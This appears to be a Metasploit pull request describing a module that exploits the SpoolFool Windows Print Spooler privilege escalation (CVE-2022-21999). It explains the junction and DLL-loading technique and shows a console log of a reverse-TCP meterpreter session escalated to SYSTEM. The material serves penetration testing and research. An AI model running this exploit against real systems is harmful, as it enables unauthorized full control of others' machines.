Add module for CVE-2022-21999 and More Railgun Definitions

[space-r7]

Description

The Windows Print Spooler has a privilege escalation vulnerability that can be leveraged to achieve code execution as SYSTEM.

The SpoolDirectory, a configuration setting that holds the path that a printer's spooled jobs are sent to, is writable for all users, and it can be configured via SetPrinterDataEx() provided the caller has the PRINTER_ACCESS_ADMINISTER permission. If the SpoolDirectory path does not exist, it will be created once the print spooler reinitializes.

Calling SetPrinterDataEx() with the CopyFiles\ registry key will load the dll passed in as the pData argument, meaning that writing a dll to the SpoolDirectory location can be loaded by the print spooler.

Using a directory junction and UNC path for the SpoolDirectory, the exploit writes a payload to C:\Windows\System32\spool\drivers\x64\4 and loads it by calling SetPrinterDataEx(), resulting in code execution as SYSTEM.

Verification

• Get a meterpreter session on the target
• Do: use exploit/windows/local/cve_2022_21999_spoolfool_privesc
• Do: set SESSION <sess_no>
• Do: set LHOST <lhost>
• Do: set LPORT <port_no>
• Do: run
• You should get a meterpreter session with SYSTEM privileges.

Notes

• This exploit can succeed a max of two times since the Print Spooler will not automatically restart after two crashes. This could be fixed with a reboot, but I decided not to add that in since that's pretty invasive

• Windows 7 and Windows Server 2016 are also technically vulnerable, but not supported by this module. Windows 7 does not appear to have the AppVTerminator.dll that's used to force a crash in the Print Spooler, so the only other option would be rebooting, which I didn't add for the reason mentioned above. The one version of 2016 I tested only allowed administrators to open an existing printer / add a new one

• Getting a session literally takes minutes, and I haven't figured out a way to shorten that. The Sending stage.. is pretty immediate, but getting an actual meterpreter prompt takes minutes

• This exploit does not use all of the definitions, constants, etc. added, but I figured they may be useful to add in now for potential modules later down the line

Scenarios

Windows 10 21H2 (Build 19044.1288)

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.98.1:4444
[*] Sending stage (200262 bytes) to 172.16.98.146
[*] Meterpreter session 1 opened (172.16.98.1:4444 -> 172.16.98.146:49674 ) at 2022-03-14 09:02:21 -0500

meterpreter > getuid
Server username: DESKTOP-49N0D8H\shelbypace
meterpreter > sysinfo
Computer        : DESKTOP-49N0D8H
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > set lhost 172.16.98.1
lhost => 172.16.98.1
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > set session 1
session => 1
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 172.16.98.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Making base directory: C:\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd
[+] Printer DZBUma was successfully added.
[*] Setting spool directory: \\localhost\C$\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd\4
[*] Creating junction point: C:\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd -> C:\Windows\System32\spool\drivers\x64
[*] Creating the spool directory by restarting spooler...
[*] Attempting to restart print spooler.
[*] Sleeping for 5 seconds.
[+] Directory was successfully created.
[*] Writing payload to C:\Windows\System32\spool\drivers\x64\4\tqDNFaf.dll.
[*] Attempting to set permissions for payload.
[*] Payload should have read / execute permissions now.
[*] Sending stage (200262 bytes) to 172.16.98.146
[*] Meterpreter session 2 opened (172.16.98.1:4444 -> 172.16.98.146:49677 ) at 2022-03-14 09:08:36 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-49N0D8H
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

[bwatters-r7]

Release Notes

This PR adds a module targeting SpoolFool (AKA CVE-2022-21999), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.